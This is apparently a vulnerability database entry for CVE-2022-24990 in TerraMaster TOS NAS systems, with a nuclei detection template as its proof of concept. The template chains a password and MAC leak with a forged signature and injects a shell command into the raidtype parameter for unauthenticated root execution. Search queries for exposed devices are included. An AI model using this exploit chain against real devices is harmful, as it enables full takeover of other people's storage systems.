TerraMaster TOS Unauthenticated Remote Code Execution Vulnerability

漏洞信息

漏洞名称: TerraMaster TOS Unauthenticated Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2022-24990

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: TerraMaster TOS是TerraMaster公司开发的网络附加存储(NAS)操作系统,广泛应用于家庭和企业环境中,用于数据存储和管理。该产品因其易用性和功能性而受到用户的青睐。该漏洞存在于TerraMaster TOS的api.php?mobile/createRaid接口中,由于未对raidtype和diskstring参数进行充分的输入过滤,导致攻击者可以通过构造恶意参数实现远程代码执行。具体来说,攻击者无需认证即可利用此漏洞,通过发送特制的HTTP请求,在目标系统上以root权限执行任意命令。这种漏洞的利用条件相对宽松,仅需网络可达性和正确的参数构造,即可实现对目标系统的完全控制。由于攻击者可以执行任意命令,因此可能导致数据泄露、服务中断或其他恶意操作,对受影响系统的安全构成严重威胁。

产品厂商: terra-master

产品名称: terramaster_operating_system

影响版本: version <= 4.2.30

搜索语法: app=”TerraMaster-TOS”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/34c65dfd28813dcfef8f59af304adbe5898d4424/http%2Fcves%2F2022%2FCVE-2022-24990.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

id: CVE-2022-24990

info:
  name: TerraMaster TOS < 4.2.30 - Unauthenticated Remote Code Execution
  author: iamnoooob,DhiyaneshDK
  severity: critical
  description: |
    TerraMaster NAS versions through 4.2.30 contain a remote code execution caused by unsanitized parameters raidtype and diskstring in api.php?mobile/createRaid, letting WAN attackers execute arbitrary code as root, exploit requires remote network access and crafted parameters.
  impact: |
    An attacker can execute arbitrary commands on the server, leading to a full compromise of the system.
  remediation: |
    Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.
  reference:
    - https://github.com/0xf4n9x/CVE-2022-24990
    - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation
    - https://packetstormsecurity.com/files/172904
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24990
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24990
    cwe-id: CWE-78
    epss-score: 0.94401
    epss-percentile: 0.99970
    cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: terra-master
    product: terramaster_operating_system
    shodan-query: 'TerraMaster'
    fofa-query: app="TerraMaster-TOS"
    google-query: intitle:"TOS"
  tags: cve,cve2022,terramaster,rce,unauth,kev,terra-master

http:
  - raw:
      - |
        GET /module/api.php?mobile/webNasIPS HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS

    extractors:
      - type: regex
        name: pwd
        group: 1
        regex:
          - 'PWD:([^\\]+)'
        internal: true

      - type: regex
        name: mac
        group: 1
        regex:
          - '\\"mac\\":\\"([a-zA-Z0-9:]+)\\"'
        internal: true

  - raw:
      - |
        POST /module/api.php?mobile/createRaid HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS
        Timestamp: '{{unix_time}}'
        Signature: '{{md5(substr(replace(mac, ":", ""), 6) + unix_time)}}'
        Authorization: '{{pwd}}'
        Content-Type: application/x-www-form-urlencoded

        raidtype=;id;&diskstring=XXXX

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=0\\(root\\) gid=0\\(root\\)"

      - type: word
        part: body
        words:
          - "createRaid successful"

      - type: status
        status:
          - 200